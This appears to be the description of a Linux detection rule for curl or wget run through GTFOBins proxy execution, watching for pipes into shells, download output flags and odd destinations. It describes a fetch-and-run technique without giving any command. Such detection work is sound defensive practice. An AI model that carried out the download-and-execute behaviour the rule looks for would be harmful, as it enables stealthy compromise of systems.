This rule targets the execution of curl or wget binaries as part of a GTFOBins technique in Linux systems. Attackers may leverage these commonly trusted utilities to download malicious files from the internet and execute them, often to avoid detection by typical security measures. The focus of this detection rule is on commands executed directly from the binary instead of spawning a shell, allowing for potentially stealthy behavior. The rule employs a sequence detection using attributes from process events to identify malicious behavior associated with curl/wget executed through legitimate-sounding utilities, known as living-off-the-land binaries (LoLBins). Specific actions include monitoring the process command line for characteristics that indicate proxy execution, such as using pipelines to shells, specifying output flags for downloaded content, and the attempts to connect to unusual destinations. Investigations will involve examining the surrounding process and filesystem activities, correlating any outbound connections with threat intelligence to assess their legitimacy, and searching for further suspicious activities that may indicate ongoing compromise.